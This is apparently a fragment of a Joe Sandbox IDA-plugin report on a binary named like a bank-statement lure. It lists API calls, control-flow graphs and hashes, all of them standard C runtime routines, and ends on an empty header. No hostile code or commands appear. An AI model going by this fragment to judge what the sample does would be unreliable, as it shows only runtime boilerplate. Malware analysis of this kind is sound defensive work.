                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009A8B8C,?,00000000,?,00000000,00000000), ref: 009A8459
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 009A84D4
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 009A84EF
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009A8515
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,009A8B8C,00000000,?,?,?,?,?,?,?,?,?,009A8B8C,?), ref: 009A8534
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,009A8B8C,00000000,?,?,?,?,?,?,?,?,?,009A8B8C,?), ref: 009A856D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 1324828854-1940436402

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 009A1E37
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 009A1E3F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 009A1EC8
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 009A1EF3
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 009A1F48
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$kz]G
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1591210744

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009A54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 009A639A
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 009A63D2
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009A6423
                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009A6435
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A643E
                                                                                                                                                                                                                                                      • Part of subcall function 009A62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009A7E5B,?,00000000,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD), ref: 009A6331
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 1857427562-1940436402

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 009A61DF: _free.LIBCMT ref: 009A6208
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6269
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6274
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A627F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62D3
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62DE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62E9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62F4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 372 9a36fc-9a3724 GetModuleHandleExW 373 9a3749-9a374d 372->373 374 9a3726-9a3739 GetProcAddress 372->374 377 9a3758-9a3765 call 9a123a 373->377 378 9a374f-9a3752 FreeLibrary 373->378 375 9a373b-9a3746 374->375 376 9a3748 374->376 375->376 376->373 378->377
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009A36AD,?,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002), ref: 009A371C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009A372F
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,009A36AD,?,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002,00000000), ref: 009A3752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$kz]G$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-2651540594

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 382 9a23d1-9a23d8 383 9a23da-9a23dc 382->383 384 9a23dd-9a23f8 GetLastError call 9a26a4 382->384 387 9a23fa-9a23fc 384->387 388 9a2411-9a2413 384->388 389 9a23fe-9a240f call 9a26df 387->389 390 9a2457-9a2462 SetLastError 387->390 388->390 389->388 393 9a2415-9a2425 call 9a3f67 389->393 396 9a2439-9a2449 call 9a26df 393->396 397 9a2427-9a2437 call 9a26df 393->397 403 9a244f-9a2456 call 9a3ec5 396->403 397->396 402 9a244b-9a244d 397->402 402->403 403->390
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,009A23C8,009A209F,009A1AFC), ref: 009A23DF
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009A23ED
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009A2406
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,009A23C8,009A209F,009A1AFC), ref: 009A2458
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 406 9a4424-9a4438 GetLastError 407 9a443a-9a4444 call 9a5904 406->407 408 9a4446-9a444b 406->408 407->408 413 9a448f-9a449a SetLastError 407->413 410 9a444d call 9a480c 408->410 412 9a4452-9a4458 410->412 414 9a445a 412->414 415 9a4463-9a4471 call 9a595a 412->415 416 9a445b-9a4461 call 9a4869 414->416 421 9a4473-9a4474 415->421 422 9a4476-9a448d call 9a4296 call 9a4869 415->422 424 9a449b-9a44a7 SetLastError call 9a3f24 416->424 421->416 422->413 422->424
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000008,?,009A6D69,?,?,?,009B04C8,0000002C,009A3F34,00000016,009A209F,009A1AFC), ref: 009A4428
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A445B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4483
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 009A4490
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 009A449C
                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 009A44A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3160817290-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 430 9a561e-9a5633 GetEnvironmentStringsW 431 9a568b 430->431 432 9a5635-9a5655 call 9a55e7 WideCharToMultiByte 430->432 433 9a568d-9a568f 431->433 432->431 438 9a5657 432->438 435 9a5698-9a56a0 433->435 436 9a5691-9a5692 FreeEnvironmentStringsW 433->436 436->435 439 9a5658 call 9a62ff 438->439 440 9a565d-9a5662 439->440 441 9a5680 440->441 442 9a5664-9a5678 WideCharToMultiByte 440->442 443 9a5682-9a5689 call 9a4869 441->443 442->441 444 9a567a-9a567e 442->444 443->433 444->443
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 009A5627
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A564A
                                                                                                                                                                                                                                                      • Part of subcall function 009A62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009A7E5B,?,00000000,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD), ref: 009A6331
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009A5670
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A5683
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A5692
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2278895681-0
                                                                                                                                                                                                                                                    • Opcode ID: 5cc7aeaddce1f6d234ba9182716affa7b021440e8335031685240dc3417c7ce1
                                                                                                                                                                                                                                                    • Instruction ID: 5f3fa6a80b051553f9f1b2388c8675da441cb2a8500b55e5eae32f4c0d6b4545
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc7aeaddce1f6d234ba9182716affa7b021440e8335031685240dc3417c7ce1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F272706A257F67211ABA6C8CD7B6A6DDEC3FA43570129FD04C3101EBA48C0191F0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 447 9a44a8-9a44bf GetLastError 448 9a44cd-9a44d2 447->448 449 9a44c1-9a44cb call 9a5904 447->449 450 9a44d4 call 9a480c 448->450 449->448 454 9a451e-9a4525 SetLastError 449->454 452 9a44d9-9a44df 450->452 455 9a44ea-9a44f8 call 9a595a 452->455 456 9a44e1 452->456 457 9a4527-9a452c 454->457 463 9a44fa-9a44fb 455->463 464 9a44fd-9a4513 call 9a4296 call 9a4869 455->464 458 9a44e2-9a44e8 call 9a4869 456->458 465 9a4515-9a451c SetLastError 458->465 463->458 464->454 464->465 465->457
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,009A47FE,009A7E79,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD,?,00000000), ref: 009A44AD
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A44E2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4509
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009A4516
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009A451F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                    • Opcode ID: ba09c35a27d5a27d8fc82be8c0877a7d33d206fcdbb34f6d04e35f9339815997
                                                                                                                                                                                                                                                    • Instruction ID: fded5f84c2846d130f9766056b595179bce5d116c575acb3b057d00859e5821e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba09c35a27d5a27d8fc82be8c0877a7d33d206fcdbb34f6d04e35f9339815997
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03012876714A10AB8212777D7C49F6B22AEEFC77B57210124F829D61A3EFF88D0151E0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 470 9a6176-9a6181 471 9a61dc-9a61de 470->471 472 9a6183-9a618b 470->472 473 9a618d-9a6193 call 9a4869 472->473 474 9a6194-9a619d 472->474 473->474 476 9a619f-9a61a5 call 9a4869 474->476 477 9a61a6-9a61af 474->477 476->477 480 9a61b8-9a61c1 477->480 481 9a61b1-9a61b7 call 9a4869 477->481 484 9a61ca-9a61d3 480->484 485 9a61c3-9a61c9 call 9a4869 480->485 481->480 484->471 488 9a61d5-9a61db call 9a4869 484->488 485->484 488->471
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A618E
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61A0
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61B2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61C4
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61D6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: c3b5990c890ed81559309a32763a05512f4cf95010ca80d23c4dedf6f521789d
                                                                                                                                                                                                                                                    • Instruction ID: 5db9ddc53ffc435152a4955beeae74ce790df2cd1d2f07f1978ae1171494f2da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3b5990c890ed81559309a32763a05512f4cf95010ca80d23c4dedf6f521789d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F0683261C200EFC660DB59F995D167BDDEAC676039C0805F409D7551C738FC4046D0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DAD
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DBF
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DD2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DE3
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DF4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: f6e2bc44cd29f672ddf2b38a49309d38521ea8868d2098397e895e18df462a31
                                                                                                                                                                                                                                                    • Instruction ID: 1ed1d2ce23bb772e06c544b66e59456a6695f5b55397e5c4f820ae2c397ec847
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6e2bc44cd29f672ddf2b38a49309d38521ea8868d2098397e895e18df462a31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F03A7882C2608FC7516F1DFE115497BA4EBCA730390031AF4129A2F1C7B90941ABC0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 0-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 68ba754921730f120a9121d33d536a0ac322bdebb87ae24abe280438de080600
                                                                                                                                                                                                                                                    • Instruction ID: 7b38e3681c9452486022b70a4f72adb8e972aae187a2f4ef1e4feda927b3d3c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68ba754921730f120a9121d33d536a0ac322bdebb87ae24abe280438de080600
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C351AFB1D012499BDB11DFA8C945FAF7BB8EF87324F140559E401A7292DB749902CBF1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4A27
                                                                                                                                                                                                                                                      • Part of subcall function 009A474D: IsProcessorFeaturePresent.KERNEL32(00000017,009A473C,00000000,?,00000004,00000000,?,?,?,?,009A4749,00000000,00000000,00000000,00000000,00000000), ref: 009A474F
                                                                                                                                                                                                                                                      • Part of subcall function 009A474D: GetCurrentProcess.KERNEL32(C0000417), ref: 009A4771
                                                                                                                                                                                                                                                      • Part of subcall function 009A474D: TerminateProcess.KERNEL32(00000000), ref: 009A4778
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                    • String ID: *?$.$kz]G
                                                                                                                                                                                                                                                    • API String ID: 2667617558-3452094433
                                                                                                                                                                                                                                                    • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                    • Instruction ID: 78a79116cc77a7b907d09278ed75dc64e96126615173eb44040db4053fa0b922
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF519375E001199FDF14CFA8C881AAEF7B9EFDA314F24416AE454E7341E6759E018B90
                                                                                                                                                                                                                                                    APIs
